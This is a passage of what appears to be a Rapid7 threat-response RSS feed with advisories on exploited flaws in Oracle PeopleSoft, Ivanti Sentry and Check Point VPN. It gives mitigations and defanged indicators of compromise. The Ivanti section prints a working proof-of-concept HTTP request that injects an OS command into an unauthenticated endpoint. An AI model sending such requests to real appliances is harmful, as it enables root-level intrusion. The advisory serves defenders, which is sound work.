style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> URI path appears in both the indicators of compromise for this campaign and in a PeopleSoft exploit chain for </span><a href="https://www.cve.org/CVERecord?id=CVE-2013-3821"><span style='font-size: undefined;'>CVE-2013-3821</span></a><span style='font-size: undefined;'>, </span><a href="https://blog.lexfo.fr/oracle-peoplesoft-xxe-to-rce.html"><span style='font-size: undefined;'>detailed by Lexfo in 2017</span></a><span style='font-size: undefined;'>. A related XML External Entity (XXE) vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2017-3548"><span style='font-size: undefined;'>CVE-2017-3548</span></a><span style='font-size: undefined;'>, targeted a different Integration Gateway connector (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>PeopleSoftServiceListeningConnector</span></span><span style='font-size: undefined;'>) under the same </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/</span></span><span style='font-size: undefined;'> path.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>TrendAI's detection signatures for CVE-2026-35273 classify the underlying vulnerability as an SSRF. These include IPS Rule 1012580 ("Oracle Peoplesoft PeopleTools SSRF Vulnerability") and DDI Rule 5855 ("Peoplesoft PeopleTools Environment Management Hub (PSEMHUB) SSRF Exploit"). Mandiant describes CVE-2026-35273 as a critical remote code execution vulnerability, indicating that the SSRF serves as the mechanism through which code execution is achieved. Based on Mandiant's analysis, two endpoints are involved in exploitation: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/hub</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'>. The exploit chain may also cause the target system to make outbound SMB connections (TCP port 445) to external destinations, potentially allowing attackers to capture Windows machine-account NetNTLM hashes.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Post-exploitation activity observed by Mandiant included the deployment of </span><a href="https://meshcentral.com/"><span style='font-size: undefined;'>MeshCentral</span></a><span style='font-size: undefined;'> (an open-source, and self-hosted web-based remote monitoring and management platform) remote management agents configured to masquerade as Microsoft Azure services (e.g., </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>meshagent64-azure-ops.exe</span></span><span style='font-size: undefined;'>), with C2 communications directed to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>wss://azurenetfiles[.]net:443/agent.ashx</span></span><span style='font-size: undefined;'>. The attackers performed internal reconnaissance of PeopleSoft configurations, deployed lateral movement scripts, and exfiltrated data using </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>zstd</span></span><span style='font-size: undefined;'> compression.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running PeopleTools versions </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.61</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.62</span></span><span style='font-size: undefined;'> should apply the vendor-supplied </span><a href="https://support.oracle.com/support/?documentId=CPU187"><span style='font-size: undefined;'>patch</span></a><span style='font-size: undefined;'> on an emergency basis, without waiting for a regular patch cycle to occur. Oracle has characterized this as a high-priority risk reduction measure.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to patching, organizations should implement the following compensating controls:</span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Disable the Environment Management Hub (EMHub) Service</strong></span><span style='font-size: undefined;'> in multi-server configurations, or completely remove the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>PSEMHUB</span></span><span style='font-size: undefined;'> application in single-server configurations.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Block external access</strong></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/*</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> at the network perimeter or firewall level. Per Mandiant, restricting these endpoints is considered non-breaking for standard end-user PeopleSoft Internet Architecture (PIA) browser sessions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Monitor outbound SMB traffic</strong></span><span style='font-size: undefined;'> (TCP port 445) from PeopleSoft servers to untrusted external destinations.</span></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Given that exploitation occurred as early as May 27, 2026, Rapid7 strongly recommends investigating for signs of compromise even after patching, using the indicators of compromise outlined below.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'>Oracle security alert</span></a><span style='font-size: undefined;'> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>Mandiant's report</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to</span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'> CVE-2026-35273</span></a><span style='font-size: undefined;'> with authenticated</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>vulnerability checks available in the 12th June 2026 content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7's Intelligence Hub can track the latest developments surrounding CVE-2026-35273, including indicators of compromise (IOCs) from the Mandiant report published on June 11, 2026.</span></p><h2 style="direction: ltr;">Indicators of compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following indicators of compromise are sourced from </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>Mandiant's report</span></a><span style='font-size: undefined;'>. Mandiant has also published a </span><a href="https://www.virustotal.com/gui/collection/50ac0ffbc9ecf4559949faa026a412c9bb57e81d3ae0714a4dcd25b4fec35105"><span style='font-size: undefined;'>GTI collection</span></a><span style='font-size: undefined;'> with additional IOCs for registered users.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Network indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Staging and C2 infrastructure:</strong></span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]186</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]187</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]188</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]189</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]190</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>azurenetfiles[.]net (C2 domain masquerading as Microsoft Azure)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>176.120.22[.]24 (ShinyHunters DLS mirror)</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>File indicators</span></h3><table><colgroup data-width='750'><col style="width:32.21153846153846%"/><col style="width:28.525641025641026%"/><col style="width:39.26282051282052%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Filename</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>SHA-256</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent64-azure-ops.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent64-v2.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent32-azure-ops.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent (32-bit)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Unconfigured Linux MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>.bash_history</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker command history</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Host-based indicators</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unexpected </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.jsp</span></span><span style='font-size: undefined;'> files under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;PS_CFG_HOME&gt;/webserv/&lt;domain&gt;/applications/peoplesoft/PSEMHUB.war/</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unauthorized files or directories under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.../PSEMHUB.war/envmetadata/transactions/</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unexpected directories named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>logs</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>persistantstorage</span></span><span style='font-size: undefined;'>, or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>scratchpad</span></span><span style='font-size: undefined;'> under PSEMHUB paths</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Recently created or modified </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.xml</span></span><span style='font-size: undefined;'> files under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;docroot&gt;/envmetadata/data/environment/</span></span><span style='font-size: undefined;'> (potential XMLDecoder persistence)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Defacement and extortion marker file: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT</span></span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Log-based indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>HTTP </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>POST</span></span><span style='font-size: undefined;'> requests to the following endpoints from external source IPs:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/hub</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Requests to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> containing loopback addresses (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>127.0.0.1</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>localhost</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>::1</span></span><span style='font-size: undefined;'>) or internal IP ranges within request headers or parameters may indicate SSRF exploitation.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 12, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>June 12, 2026</strong></span><span style='font-size: undefined;'>: CVE added to CISA KEV.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273</link>
      <guid isPermaLink="false">blt711647ad1a2d072d</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Fri, 12 Jun 2026 13:43:04 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 9, 2026, Ivanti </span><a href="https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for two critical vulnerabilities affecting </span><a href="https://www.ivanti.com/products/secure-connectivity/sentry"><span style='font-size: undefined;'>Ivanti Sentry</span></a><span style='font-size: undefined;'> (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-10520"><span style='font-size: undefined;'>CVE-2026-10520</span></a><span style='font-size: undefined;'>, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-10523"><span style='font-size: undefined;'>CVE-2026-10523</span></a><span style='font-size: undefined;'>, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are not aware of any customers being exploited by either of these vulnerabilities at the time of disclosure. </span></p><table><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3.1</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CWE</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-10520"><span style='font-size: undefined;'>CVE-2026-10520</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"><span style='font-size: undefined;'>10.0 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>OS Command Injection (</span><a href="https://cwe.mitre.org/data/definitions/78.html"><span style='font-size: undefined;'>CWE-78</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-10523"><span style='font-size: undefined;'>CVE-2026-10523</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"><span style='font-size: undefined;'>9.9 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication Bypass Using an Alternate Path or Channel (</span><a href="https://cwe.mitre.org/data/definitions/288.html"><span style='font-size: undefined;'>CWE-288</span></a><span style='font-size: undefined;'>)</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>On June 10, 2026, watchTowr published a </span><a href="https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of CVE-2026-10520 that includes a proof-of-concept (PoC) exploit for unauthenticated RCE. Given the trivial nature of exploitation and the availability of a public PoC, exploitation in-the-wild is likely to begin. Ivanti Sentry has featured on the CISA KEV list </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=ivanti%2Csentry&amp;field_date_added_wrapper=all&amp;field_cve=&amp;sort_by=field_date_added&amp;items_per_page=20&amp;url="><span style='font-size: undefined;'>twice</span></a><span style='font-size: undefined;'> in the past (for the vulnerabilities CVE-2023-38035 and CVE-2020-15505), so we know threat actors will likely target this product. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On June 11, 2026, CVE-2026-10520 was </span><a href="https://www.cisa.gov/news-events/alerts/2026/06/11/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. With active exploitation now occurring, organizations running affected versions of Ivanti Sentry should remediate these issues on an urgent basis, outside of normal patching cycles.</span></p><h2 style="direction: ltr;">Technical overview for CVE-2026-10520</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Based upon the </span><a href="https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> by watchTowr, CVE-2026-10520 resides in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ConfigServiceController</span></span><span style='font-size: undefined;'> class within the Sentry web application, which is accessible via a POST request to the unauthenticated endpoint </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/mics/api/v2/sentry/mics-config/handleMessage</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>handleMessage</span></span><span style='font-size: undefined;'> endpoint accepts an attacker supplied </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>message</span></span><span style='font-size: undefined;'> parameter that is parsed as an internal configuration command. This ultimately results in arbitrary OS command execution as root with an attacker control OS command. Shown below is an example HTTP request generated by the </span><a href="https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523"><span style='font-size: undefined;'>public PoC</span></a><span style='font-size: undefined;'> to execute the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>id</span><span style='font-size: undefined;'> command on an affected system:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.33.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E</pre><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A vendor-supplied update is available to remediate both CVE-2026-10520 and CVE-2026-10523. The following versions of Ivanti Sentry are affected:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.7.0</span></span><span style='font-size: undefined;'> and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.6.1</span></span><span style='font-size: undefined;'> and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.5.1</span></span><span style='font-size: undefined;'> and below</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The following fixed versions of Ivanti Sentry remediate both vulnerabilities:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.7.1</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.6.2</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.5.2</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Given the critical severity of these vulnerabilities, the availability of a public PoC exploit for CVE-2026-10520, and the unauthenticated attack vector, Rapid7 strongly recommends updating affected Ivanti Sentry appliances on an urgent basis, outside of normal patching cycles.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US"><span style='font-size: undefined;'>vendor's security advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-10520 and CVE-2026-10523 with unauthenticated vulnerability checks available in the June 11 content release.</span></p><h2>Updates</h2><ul><li><span style='font-size: undefined;'><strong>June 10, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><span style='font-size: undefined;'><strong>June 11, 2026: </strong></span><span style='font-size: undefined;'>Updated to reflect availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>June 12, 2026: </strong></span><span style='font-size: undefined;'>Updated Overview to add new CISA KEV reference.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry</link>
      <guid isPermaLink="false">blt0bd95f53fd2cf179</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 10 Jun 2026 10:21:07 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 8, 2026, Check Point </span><a href="https://support.checkpoint.com/results/sk/sk185033"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-50751"><span style='font-size: undefined;'>CVE-2026-50751</span></a><span style='font-size: undefined;'>, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN, Mobile Access, and Spark Firewall products. The vulnerability affects deployments configured to use the deprecated IKEv1 key exchange protocol where gateways accept legacy Remote Access clients and do not require a machine certificate for connections.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-50751, classified as improper authentication (</span><a href="https://cwe.mitre.org/data/definitions/287.html"><span style='font-size: undefined;'>CWE-287</span></a><span style='font-size: undefined;'>), has a CVSS score of 9.3. The vulnerability stems from a logic flow weakness in how Remote Access and Mobile Access components validate certificates during IKEv1 key exchange; successful exploitation allows an unauthenticated attacker to establish a VPN session without providing valid credentials. Per the vendor, additional post-authentication activity is required to access internal resources or escalate privileges.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has indicated that CVE-2026-50751 is being actively exploited in the wild, with observed activity dating back to May 7, 2026 and an increase in early June. The vendor characterizes the campaign as limited in scope, affecting several dozen organizations. At least one incident has been linked to a Qilin ransomware affiliate, which Check Point assesses with medium confidence. </span>Rapid7 has observed two cases with high confidence that can be attributed to CVE-2026-50751. As of June 8, 2026,  this vulnerability has been added to the CISA KEV.</p><p style="direction: ltr;"><span style='font-size: undefined;'>Separately, during its investigation Check Point identified a related vulnerability, </span><a href="https://support.checkpoint.com/results/sk/sk185035"><span style='font-size: undefined;'>CVE-2026-50752</span></a><span style='font-size: undefined;'> (CVSS 7.4), in the same IKEv1 code path that could enable a man-in-the-middle attack against site-to-site VPN tunnels under certain configurations. No exploitation of CVE-2026-50752 has been observed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point VPN products have been targeted by zero-day vulnerabilities in the </span><a href="https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/"><span style='font-size: undefined;'>past</span></a><span style='font-size: undefined;'>. In May 2024, </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24919"><span style='font-size: undefined;'>CVE-2024-24919</span></a><span style='font-size: undefined;'>, a high-severity information disclosure vulnerability in Check Point Quantum Security Gateways, was exploited in the wild and subsequently added to the CISA Known Exploited Vulnerabilities (KEV) catalog. Organizations running affected Check Point products are urged to apply the available hot fixes and follow the vendor guidance to remediate these issues.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Check Point has released hotfixes to remediate CVE-2026-50751. Affected organizations should apply the available updates on an emergency basis, without waiting for a regular patch cycle to occur.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The following products and versions are affected (Remote Access VPN, Mobile Access / SSL VPN, Spark Firewall):</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.20.X</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.40</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'> (End of Support)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10.X</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.20</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.00.X</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'>R82.10</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Notably, four of the nine affected version branches (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.20.X</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R80.40</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81</span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>R81.10</span><span style='font-size: undefined;'>) have reached End of Support. Organizations still running these versions should prioritize migration to a supported release.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For organizations unable to immediately apply the hotfix, Check Point has provided the following alternative mitigations:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Remove support for the legacy remote access client</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Configure global properties for Remote Access VPN authentication to IKEv2 only</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Set machine certificate authentication as mandatory</span></p></li><li style="direction: ltr;"><p 